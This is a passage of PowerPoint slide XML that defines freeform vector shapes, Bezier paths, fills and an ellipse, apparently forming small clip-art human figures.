                      <a:lnTo>
                        <a:pt x="199" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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17" name="Freeform 1765">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBB3547-FBBB-47AF-A127-168FD448A31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26" y="2006"/>
                  <a:ext cx="268" cy="93"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 36 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 156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3" h="156">
                      <a:moveTo>
                        <a:pt x="453" y="156"/>
                      </a:move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453" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="15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18" name="Freeform 1766">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C2E218A-3A67-4393-8752-DE3A46009DE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4" y="1984"/>
                  <a:ext cx="306" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 37 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 37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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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10" name="Group 1781">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2810B5-3CBD-42E5-B054-FB32D83A2B07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399934" y="1745924"/>
              <a:ext cx="246064" cy="382586"/>
              <a:chOff x="2363" y="1132"/>
              <a:chExt cx="343" cy="529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2004" name="Freeform 1782">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{941FF2EE-6920-4C24-8217-15CD9656F8A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74" y="1449"/>
                <a:ext cx="145" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 36 h 140"/>
                  <a:gd name="T2" fmla="*/ 108 w 108"/>
                  <a:gd name="T3" fmla="*/ 35 h 140"/>
                  <a:gd name="T4" fmla="*/ 108 w 108"/>
                  <a:gd name="T5" fmla="*/ 28 h 140"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 23 h 140"/>
                  <a:gd name="T8" fmla="*/ 108 w 108"/>
                  <a:gd name="T9" fmla="*/ 22 h 140"/>
                  <a:gd name="T10" fmla="*/ 108 w 108"/>
                  <a:gd name="T11" fmla="*/ 17 h 140"/>
                  <a:gd name="T12" fmla="*/ 108 w 108"/>
                  <a:gd name="T13" fmla="*/ 16 h 140"/>
                  <a:gd name="T14" fmla="*/ 108 w 108"/>
                  <a:gd name="T15" fmla="*/ 16 h 140"/>
                  <a:gd name="T16" fmla="*/ 89 w 108"/>
                  <a:gd name="T17" fmla="*/ 7 h 140"/>
                  <a:gd name="T18" fmla="*/ 64 w 108"/>
                  <a:gd name="T19" fmla="*/ 2 h 140"/>
                  <a:gd name="T20" fmla="*/ 57 w 108"/>
                  <a:gd name="T21" fmla="*/ 4 h 140"/>
                  <a:gd name="T22" fmla="*/ 49 w 108"/>
                  <a:gd name="T23" fmla="*/ 6 h 140"/>
                  <a:gd name="T24" fmla="*/ 49 w 108"/>
                  <a:gd name="T25" fmla="*/ 6 h 140"/>
                  <a:gd name="T26" fmla="*/ 0 w 108"/>
                  <a:gd name="T27" fmla="*/ 18 h 140"/>
                  <a:gd name="T28" fmla="*/ 29 w 108"/>
                  <a:gd name="T29" fmla="*/ 47 h 140"/>
                  <a:gd name="T30" fmla="*/ 62 w 108"/>
                  <a:gd name="T31" fmla="*/ 40 h 140"/>
                  <a:gd name="T32" fmla="*/ 62 w 108"/>
                  <a:gd name="T33" fmla="*/ 118 h 140"/>
                  <a:gd name="T34" fmla="*/ 101 w 108"/>
                  <a:gd name="T35" fmla="*/ 129 h 140"/>
                  <a:gd name="T36" fmla="*/ 108 w 108"/>
                  <a:gd name="T37" fmla="*/ 117 h 140"/>
                  <a:gd name="T38" fmla="*/ 108 w 108"/>
                  <a:gd name="T39" fmla="*/ 36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8" h="140">
                    <a:moveTo>
                      <a:pt x="108" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="33"/>
                      <a:pt x="108" y="30"/>
                      <a:pt x="108" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="28"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="108" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="23"/>
                      <a:pt x="108" y="22"/>
                      <a:pt x="108" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="21"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="4"/>
                      <a:pt x="95" y="8"/>
                      <a:pt x="89" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="64" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="3"/>
                      <a:pt x="57" y="4"/>
                      <a:pt x="57" y="4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67"/>
                      <a:pt x="62" y="109"/>
                      <a:pt x="62" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="138"/>
                      <a:pt x="89" y="140"/>
                      <a:pt x="101" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="126"/>
                      <a:pt x="108" y="122"/>
                      <a:pt x="108" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="101"/>
                      <a:pt x="107" y="69"/>
                      <a:pt x="108" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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05" name="Freeform 1783">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D16A6E1-B8A2-4AB6-8B62-DDCE5F4916A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18" y="1435"/>
                <a:ext cx="267" cy="226"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 197"/>
                  <a:gd name="T1" fmla="*/ 44 h 167"/>
                  <a:gd name="T2" fmla="*/ 196 w 197"/>
                  <a:gd name="T3" fmla="*/ 37 h 167"/>
                  <a:gd name="T4" fmla="*/ 177 w 197"/>
                  <a:gd name="T5" fmla="*/ 18 h 167"/>
                  <a:gd name="T6" fmla="*/ 137 w 197"/>
                  <a:gd name="T7" fmla="*/ 25 h 167"/>
                  <a:gd name="T8" fmla="*/ 99 w 197"/>
                  <a:gd name="T9" fmla="*/ 35 h 167"/>
                  <a:gd name="T10" fmla="*/ 99 w 197"/>
                  <a:gd name="T11" fmla="*/ 52 h 167"/>
                  <a:gd name="T12" fmla="*/ 99 w 197"/>
                  <a:gd name="T13" fmla="*/ 35 h 167"/>
                  <a:gd name="T14" fmla="*/ 99 w 197"/>
                  <a:gd name="T15" fmla="*/ 35 h 167"/>
                  <a:gd name="T16" fmla="*/ 99 w 197"/>
                  <a:gd name="T17" fmla="*/ 2 h 167"/>
                  <a:gd name="T18" fmla="*/ 89 w 197"/>
                  <a:gd name="T19" fmla="*/ 14 h 167"/>
                  <a:gd name="T20" fmla="*/ 2 w 197"/>
                  <a:gd name="T21" fmla="*/ 8 h 167"/>
                  <a:gd name="T22" fmla="*/ 2 w 197"/>
                  <a:gd name="T23" fmla="*/ 10 h 167"/>
                  <a:gd name="T24" fmla="*/ 2 w 197"/>
                  <a:gd name="T25" fmla="*/ 31 h 167"/>
                  <a:gd name="T26" fmla="*/ 12 w 197"/>
                  <a:gd name="T27" fmla="*/ 67 h 167"/>
                  <a:gd name="T28" fmla="*/ 70 w 197"/>
                  <a:gd name="T29" fmla="*/ 83 h 167"/>
                  <a:gd name="T30" fmla="*/ 83 w 197"/>
                  <a:gd name="T31" fmla="*/ 82 h 167"/>
                  <a:gd name="T32" fmla="*/ 149 w 197"/>
                  <a:gd name="T33" fmla="*/ 65 h 167"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 137 h 167"/>
                  <a:gd name="T36" fmla="*/ 150 w 197"/>
                  <a:gd name="T37" fmla="*/ 141 h 167"/>
                  <a:gd name="T38" fmla="*/ 197 w 197"/>
                  <a:gd name="T39" fmla="*/ 140 h 167"/>
                  <a:gd name="T40" fmla="*/ 196 w 197"/>
                  <a:gd name="T41" fmla="*/ 4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7" h="167">
                    <a:moveTo>
                      <a:pt x="196" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="44"/>
                      <a:pt x="196" y="40"/>
                      <a:pt x="196" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="23"/>
                      <a:pt x="183" y="19"/>
                      <a:pt x="177" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="17"/>
                      <a:pt x="137" y="25"/>
                      <a:pt x="137" y="2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20"/>
                      <a:pt x="99" y="4"/>
                      <a:pt x="99" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="8"/>
                      <a:pt x="95" y="13"/>
                      <a:pt x="89" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="16"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="2" y="8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55"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="12" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="69"/>
                      <a:pt x="66" y="82"/>
                      <a:pt x="70" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="83"/>
                      <a:pt x="78" y="84"/>
                      <a:pt x="83" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="78"/>
                      <a:pt x="127" y="71"/>
                      <a:pt x="149" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="138"/>
                      <a:pt x="150" y="140"/>
                      <a:pt x="150" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="167"/>
                      <a:pt x="196" y="163"/>
                      <a:pt x="197" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="125"/>
                      <a:pt x="196" y="60"/>
                      <a:pt x="196" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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06" name="Freeform 1784">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F08D3A8-C451-4EA2-9B1D-98AE77AF43F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63" y="1229"/>
                <a:ext cx="343" cy="269"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 254"/>
                  <a:gd name="T1" fmla="*/ 119 h 200"/>
                  <a:gd name="T2" fmla="*/ 184 w 254"/>
                  <a:gd name="T3" fmla="*/ 127 h 200"/>
                  <a:gd name="T4" fmla="*/ 173 w 254"/>
                  <a:gd name="T5" fmla="*/ 55 h 200"/>
                  <a:gd name="T6" fmla="*/ 144 w 254"/>
                  <a:gd name="T7" fmla="*/ 27 h 200"/>
                  <a:gd name="T8" fmla="*/ 96 w 254"/>
                  <a:gd name="T9" fmla="*/ 14 h 200"/>
                  <a:gd name="T10" fmla="*/ 51 w 254"/>
                  <a:gd name="T11" fmla="*/ 2 h 200"/>
                  <a:gd name="T12" fmla="*/ 18 w 254"/>
                  <a:gd name="T13" fmla="*/ 13 h 200"/>
                  <a:gd name="T14" fmla="*/ 3 w 254"/>
                  <a:gd name="T15" fmla="*/ 96 h 200"/>
                  <a:gd name="T16" fmla="*/ 3 w 254"/>
                  <a:gd name="T17" fmla="*/ 96 h 200"/>
                  <a:gd name="T18" fmla="*/ 2 w 254"/>
                  <a:gd name="T19" fmla="*/ 99 h 200"/>
                  <a:gd name="T20" fmla="*/ 2 w 254"/>
                  <a:gd name="T21" fmla="*/ 99 h 200"/>
                  <a:gd name="T22" fmla="*/ 9 w 254"/>
                  <a:gd name="T23" fmla="*/ 118 h 200"/>
                  <a:gd name="T24" fmla="*/ 26 w 254"/>
                  <a:gd name="T25" fmla="*/ 119 h 200"/>
                  <a:gd name="T26" fmla="*/ 33 w 254"/>
                  <a:gd name="T27" fmla="*/ 117 h 200"/>
                  <a:gd name="T28" fmla="*/ 33 w 254"/>
                  <a:gd name="T29" fmla="*/ 117 h 200"/>
                  <a:gd name="T30" fmla="*/ 36 w 254"/>
                  <a:gd name="T31" fmla="*/ 116 h 200"/>
                  <a:gd name="T32" fmla="*/ 43 w 254"/>
                  <a:gd name="T33" fmla="*/ 114 h 200"/>
                  <a:gd name="T34" fmla="*/ 44 w 254"/>
                  <a:gd name="T35" fmla="*/ 76 h 200"/>
                  <a:gd name="T36" fmla="*/ 41 w 254"/>
                  <a:gd name="T37" fmla="*/ 77 h 200"/>
                  <a:gd name="T38" fmla="*/ 44 w 254"/>
                  <a:gd name="T39" fmla="*/ 53 h 200"/>
                  <a:gd name="T40" fmla="*/ 43 w 254"/>
                  <a:gd name="T41" fmla="*/ 171 h 200"/>
                  <a:gd name="T42" fmla="*/ 53 w 254"/>
                  <a:gd name="T43" fmla="*/ 183 h 200"/>
                  <a:gd name="T44" fmla="*/ 111 w 254"/>
                  <a:gd name="T45" fmla="*/ 199 h 200"/>
                  <a:gd name="T46" fmla="*/ 140 w 254"/>
                  <a:gd name="T47" fmla="*/ 177 h 200"/>
                  <a:gd name="T48" fmla="*/ 140 w 254"/>
                  <a:gd name="T49" fmla="*/ 171 h 200"/>
                  <a:gd name="T50" fmla="*/ 140 w 254"/>
                  <a:gd name="T51" fmla="*/ 139 h 200"/>
                  <a:gd name="T52" fmla="*/ 139 w 254"/>
                  <a:gd name="T53" fmla="*/ 98 h 200"/>
                  <a:gd name="T54" fmla="*/ 137 w 254"/>
                  <a:gd name="T55" fmla="*/ 84 h 200"/>
                  <a:gd name="T56" fmla="*/ 136 w 254"/>
                  <a:gd name="T57" fmla="*/ 79 h 200"/>
                  <a:gd name="T58" fmla="*/ 137 w 254"/>
                  <a:gd name="T59" fmla="*/ 84 h 200"/>
                  <a:gd name="T60" fmla="*/ 139 w 254"/>
                  <a:gd name="T61" fmla="*/ 98 h 200"/>
                  <a:gd name="T62" fmla="*/ 145 w 254"/>
                  <a:gd name="T63" fmla="*/ 136 h 200"/>
                  <a:gd name="T64" fmla="*/ 145 w 254"/>
                  <a:gd name="T65" fmla="*/ 137 h 200"/>
                  <a:gd name="T66" fmla="*/ 145 w 254"/>
                  <a:gd name="T67" fmla="*/ 137 h 200"/>
                  <a:gd name="T68" fmla="*/ 145 w 254"/>
                  <a:gd name="T69" fmla="*/ 142 h 200"/>
                  <a:gd name="T70" fmla="*/ 155 w 254"/>
                  <a:gd name="T71" fmla="*/ 165 h 200"/>
                  <a:gd name="T72" fmla="*/ 170 w 254"/>
                  <a:gd name="T73" fmla="*/ 171 h 200"/>
                  <a:gd name="T74" fmla="*/ 223 w 254"/>
                  <a:gd name="T75" fmla="*/ 155 h 200"/>
                  <a:gd name="T76" fmla="*/ 209 w 254"/>
                  <a:gd name="T77" fmla="*/ 119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4" h="200">
                    <a:moveTo>
                      <a:pt x="209" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="121"/>
                      <a:pt x="197" y="123"/>
                      <a:pt x="184" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="94"/>
                      <a:pt x="175" y="64"/>
                      <a:pt x="173" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="36"/>
                      <a:pt x="153" y="30"/>
                      <a:pt x="144" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="23"/>
                      <a:pt x="110" y="18"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="10"/>
                      <a:pt x="61" y="4"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="18" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="16"/>
                      <a:pt x="10" y="56"/>
                      <a:pt x="3" y="96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0" y="109"/>
                      <a:pt x="4" y="116"/>
                      <a:pt x="9" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="121"/>
                      <a:pt x="20" y="120"/>
                      <a:pt x="26" y="119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34" y="117"/>
                      <a:pt x="35" y="117"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="116"/>
                      <a:pt x="41" y="115"/>
                      <a:pt x="43" y="114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3" y="76"/>
                      <a:pt x="42" y="77"/>
                      <a:pt x="41" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="60"/>
                      <a:pt x="44" y="49"/>
                      <a:pt x="44" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="59"/>
                      <a:pt x="43" y="123"/>
                      <a:pt x="43" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="177"/>
                      <a:pt x="47" y="182"/>
                      <a:pt x="53" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="102" y="197"/>
                      <a:pt x="111" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="200"/>
                      <a:pt x="138" y="190"/>
                      <a:pt x="140" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="175"/>
                      <a:pt x="140" y="173"/>
                      <a:pt x="140" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="124"/>
                      <a:pt x="140" y="111"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="92"/>
                      <a:pt x="137" y="87"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="82"/>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="82"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="93"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="108"/>
                      <a:pt x="142" y="120"/>
                      <a:pt x="145" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="136"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="154"/>
                      <a:pt x="151" y="161"/>
                      <a:pt x="155" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="169"/>
                      <a:pt x="164" y="170"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="167"/>
                      <a:pt x="204" y="161"/>
                      <a:pt x="223" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="147"/>
                      <a:pt x="236" y="110"/>
                      <a:pt x="209" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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07" name="Freeform 1785">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D685FB3E-932E-4FE1-B127-342ED54EBC4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40" y="1214"/>
                <a:ext cx="89" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 16 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 54 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 30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30" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="16" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="54" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="21"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="30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08" name="Oval 1786">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BE2AEE-EB7B-44DA-9BF3-2C57A2BFD046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 flipH="1">
                <a:off x="2429" y="1132"/>
                <a:ext cx="119" cy="119"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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611" name="Group 1787">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{398F3C12-A179-4671-9566-718EF03D8B8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872509" y="2704774"/>
              <a:ext cx="246064" cy="382586"/>
              <a:chOff x="2363" y="1132"/>
              <a:chExt cx="343" cy="529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1999" name="Freeform 1788">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C760DB-9EF1-4710-83AF-8BC1243E69C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74" y="1449"/>
                <a:ext cx="145" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 36 h 140"/>
                  <a:gd name="T2" fmla="*/ 108 w 108"/>
                  <a:gd name="T3" fmla="*/ 35 h 140"/>
                  <a:gd name="T4" fmla="*/ 108 w 108"/>
                  <a:gd name="T5" fmla="*/ 28 h 140"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 23 h 140"/>
                  <a:gd name="T8" fmla="*/ 108 w 108"/>
                  <a:gd name="T9" fmla="*/ 22 h 140"/>
                  <a:gd name="T10" fmla="*/ 108 w 108"/>
                  <a:gd name="T11" fmla="*/ 17 h 140"/>
                  <a:gd name="T12" fmla="*/ 108 w 108"/>
                  <a:gd name="T13" fmla="*/ 16 h 140"/>
                  <a:gd name="T14" fmla="*/ 108 w 108"/>
                  <a:gd name="T15" fmla="*/ 16 h 140"/>
                  <a:gd name="T16" fmla="*/ 89 w 108"/>
                  <a:gd name="T17" fmla="*/ 7 h 140"/>
                  <a:gd name="T18" fmla="*/ 64 w 108"/>
                  <a:gd name="T19" fmla="*/ 2 h 140"/>
                  <a:gd name="T20" fmla="*/ 57 w 108"/>
                  <a:gd name="T21" fmla="*/ 4 h 140"/>
                  <a:gd name="T22" fmla="*/ 49 w 108"/>
                  <a:gd name="T23" fmla="*/ 6 h 140"/>
                  <a:gd name="T24" fmla="*/ 49 w 108"/>
                  <a:gd name="T25" fmla="*/ 6 h 140"/>
                  <a:gd name="T26" fmla="*/ 0 w 108"/>
                  <a:gd name="T27" fmla="*/ 18 h 140"/>
                  <a:gd name="T28" fmla="*/ 29 w 108"/>
                  <a:gd name="T29" fmla="*/ 47 h 140"/>
                  <a:gd name="T30" fmla="*/ 62 w 108"/>
                  <a:gd name="T31" fmla="*/ 40 h 140"/>
                  <a:gd name="T32" fmla="*/ 62 w 108"/>
                  <a:gd name="T33" fmla="*/ 118 h 140"/>
                  <a:gd name="T34" fmla="*/ 101 w 108"/>
                  <a:gd name="T35" fmla="*/ 129 h 140"/>
                  <a:gd name="T36" fmla="*/ 108 w 108"/>
                  <a:gd name="T37" fmla="*/ 117 h 140"/>
                  <a:gd name="T38" fmla="*/ 108 w 108"/>
                  <a:gd name="T39" fmla="*/ 36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8" h="140">
                    <a:moveTo>
                      <a:pt x="108" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="33"/>
                      <a:pt x="108" y="30"/>
                      <a:pt x="108" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="28"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="108" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
